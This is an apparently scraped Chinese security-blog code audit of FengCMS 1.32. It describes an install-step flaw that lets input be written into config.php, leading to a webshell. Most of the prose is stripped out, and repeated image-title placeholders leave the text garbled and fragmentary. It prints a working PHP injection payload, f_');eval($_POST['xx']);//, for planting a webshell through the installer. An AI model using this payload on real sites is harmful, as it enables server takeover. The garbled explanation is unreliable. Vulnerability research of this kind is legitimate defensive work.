## 

!首发于哈拉少安全小队微信公众号

 

Cms

FengCmsPHP+MYSQLFengCmsFengCmsFengCms95%

 

-

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

 

 

fengcmspayload使webshellgetshell

 

 

--/install/index.php

installindex.php25installjs

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

GETstep

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

 

--/install/install.php

POST

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

$files$config$config()

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

$file在/install/install.php8

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

$config/install/data.phpfile_get_contents

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

$config_file/install/index.phpGETstep3.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

step3.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

/config.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

payloadpayload')//payloadconfig.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

 

/index.php/system/app.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

/system/app.php访index.phpconfig.phppayloadgetshell

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

 

 

1访

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

step3payload

f_');eval($_POST['xx']);//

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

config.phpwebshell

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

访index.php

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

访

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用



 

1exit()

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

2

 

的关注公众号:哈拉少安全小队,fengcms1.32

[代码审计] fengcms1.32从详细漏洞分析到漏洞利用

 

相关文章:

  • 2021-10-08
  • 2021-08-03
  • 2022-01-10
  • 2021-11-07
  • 2021-06-13
  • 2022-12-23
猜你喜欢
  • 2021-12-24
  • 2021-06-09
  • 2021-10-07
  • 2023-03-18
  • 2021-11-30
  • 2022-12-23
相关资源
相似解决方案